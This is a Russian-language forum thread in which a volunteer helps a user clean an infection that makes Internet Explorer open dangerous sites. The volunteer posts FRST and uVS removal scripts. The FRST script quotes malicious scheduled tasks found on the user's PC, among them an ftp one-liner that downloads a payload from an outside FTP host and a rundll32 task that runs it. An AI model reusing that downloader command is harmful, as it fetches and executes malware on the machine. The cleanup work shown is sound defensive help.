Internet Explorer запускается сам по себе и автоматически направляет на опасные веб-адреса

[Алексей Корякин 0]

пофиксил...сейчас прикреплю результаты от FRST

готово...... убегаю по делам до завтра спасибо.

 

p.s: я вспомнил после чего все у меня началось,после того как я скачал с торрента программу ВидеоМастер, если это как то поможет расследованию буду рад.

 

FRST.txt

Addition.txt

Shortcut.txt

[regist 617]

1)

Driver Booster 4.4 (HKLM\...\Driver Booster_is1) (Version: 4.4.0 - IObit)
DriverPack Notifier (HKLM\...\DriverPack Notifier) (Version: 17.7.52+security.1 - DriverPack Solution)

потенциально нежелательно ПО, деинсталируйте эти программы.

 

2) На всякий случай создайте точку восстановления системы.

 

3)

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

  Start::
  CreateRestorePoint:
  Toolbar: HKU\S-1-5-21-3771618468-3873209950-3876607537-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
  FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
  2017-07-07 19:38 - 2017-07-07 19:38 - 00000000 ____D C:\ProgramData\ProductData
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{7C6E29BC-8B8B-4C3D-859E-AF6CD158BE0F}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C0-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C1-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C2-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C3-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C4-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C5-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C6-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C8-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C9-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969CA-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969D6-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File
  ContextMenuHandlers01: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} =>  -> No File
  ContextMenuHandlers01: [BB FlashBack 2] -> {A8065B9E-193F-4797-B62D-8F6321E7FCCB} =>  -> No File
  ContextMenuHandlers04: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} =>  -> No File
  Task: {52553716-593C-415E-8E74-35427B267603} - System32\Tasks\curls => C:\Users\Леша\AppData\Roaming\curl\curl.exe
  Task: {54DF886B-16F5-4EFB-97F4-4C60D284D748} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
  Task: {564FC5D7-AD53-4BF1-A322-63F381751518} - System32\Tasks\curl => C:\Users\Леша\AppData\Roaming\curl\curl_7_54.exe
  Task: {8BD17DF5-1D79-4B9A-9407-BEE9E405B6BB} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
  Task: {B3B163AE-1AF2-491A-A923-921031FBA4DD} - System32\Tasks\Mysa1 => Rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
  Task: {F8DB75D0-3012-41DF-878C-4FC6550A0805} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
  Task: {FF375C70-CAA0-4C26-B1CE-E6F3756AD1EF} - System32\Tasks\MSI => C:\Users\Леша\AppData\Roaming\Microsoft\msi.exe <==== ATTENTION
  FirewallRules: [{3CBC202D-B0FA-4201-B4E8-218C2752CEC7}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\DriverBooster.exe
  FirewallRules: [{CA28376A-ADFF-49DC-9138-24910DFEE3DB}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\DriverBooster.exe
  FirewallRules: [{0D5C741E-87C9-481F-BE3E-3516B43A57AB}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\DBDownloader.exe
  FirewallRules: [{FE37023A-5C0B-4E27-A62E-763BAA8B2808}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\DBDownloader.exe
  FirewallRules: [{DCC0E687-38F4-4CA9-9328-A09224443250}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\AutoUpdate.exe
  FirewallRules: [{4708C2D9-1E95-4B94-BFDA-D3F119B3AF8F}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\AutoUpdate.exe
  EmptyTemp:
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

 

[Алексей Корякин 0]

добрый день Regist, готово

еще хотел прикрепит скрин в каком виде у меня касперский выдает оповещение, что заблокирован опасный веб адрес, там фигурирует какая-то программа Chromium + название сайта.  ( выделил стрелками на скрине ) вдруг это как то поможет.

Fixlog.txt

Изменено 8 июля, 2017 пользователем Алексей Корякин

[regist 617]

там фигурирует какая-то программа Chromium

А она вам не знакома? Вы какими браузерами пользуетесь?

 

Сделайте полный образ автозапуска uVS, только программу скачайте отсюда.

 

[Алексей Корякин 0]

 

там фигурирует какая-то программа Chromium

А она вам не знакома? Вы какими браузерами пользуетесь?

 

Сделайте полный образ автозапуска uVS, только программу скачайте отсюда.

 

 

добрый вечер! извиняюсь что был оффлайн...дела. на счет chromium -конечно не знакома. мой основной браузер - google chrome. сейчас постараюсь сделать то что вы попросили... отпишусь...

готово..... да... ее видно в списке там.....

ЛЕША-ПК_2017-07-10_23-52-21.7z

[regist 617]

 

 

Вы какими браузерами пользуетесь?

не ответили.

И вижу вы пользуетесь репаками от Кролика, а репаки этого автора в свою очередь как раз являются источников заражения. Также как и репаки от Дьяка.

Выполните скрипт в uVS
 

;uVS v4.0.6 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG
deldir %SystemDrive%\USERS\ЛЕША\APPDATA\LOCAL\YC\
;---------command-block---------
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.153\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.165\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.22.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.22.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.23.9\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.24.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.24.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.25.11\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.25.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.26.9\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.27.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.13\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\IOBIT\DRIVER BOOSTER\4.4.0\DRIVERBOOSTER.EXE
apply

restart

[Алексей Корякин 0]

выполнил скрипт ...(но папка ZOO_ не появилась)

[regist 617]

 

 

выполнил скрипт ...(но папка ZOO_ не появилась)

И не должна.

 

@Алексей Корякин, почему уже 3-й раз вы игнорируете мой вопрос?

[Алексей Корякин 0]

 

выполнил скрипт ...(но папка ZOO_ не появилась)

И не должна.

 

@Алексей Корякин, почему уже 3-й раз вы игнорируете мой вопрос?

 

я же писал что в основном хромом... иногда опера турбо.

[regist 617]

Вопрос был не какой основной, а какими (все) пользуетесь. Вот видите ещё и Опера всплыла...

 

что с проблемой?

[Алексей Корякин 0]

только что снова вышло оповещение от касперского что заблокирован опасный веб адресс... безнадега какая-то

[regist 617]

скрин оповещения покажите. И свежий лог uVS.

[Алексей Корякин 0]

скрин оповещения покажите. И свежий лог uVS.

ЛЕША-ПК_2017-07-11_14-20-42.7z

[regist 617]

Перед выполнением предыдущего скрипта uVS вы антивирус отключали? Выполните его ещё раз. После выполнения в папке с uVS будет текстовый файл с датой в название, прикреприте его.

[Алексей Корякин 0]

Перед выполнением предыдущего скрипта uVS вы антивирус отключали? Выполните его ещё раз. После выполнения в папке с uVS будет текстовый файл с датой в название, прикреприте его.

точно не помню уже.... доброе утро. сейчас сделаю снова

вот

2017-07-12_07-06-47_log.txt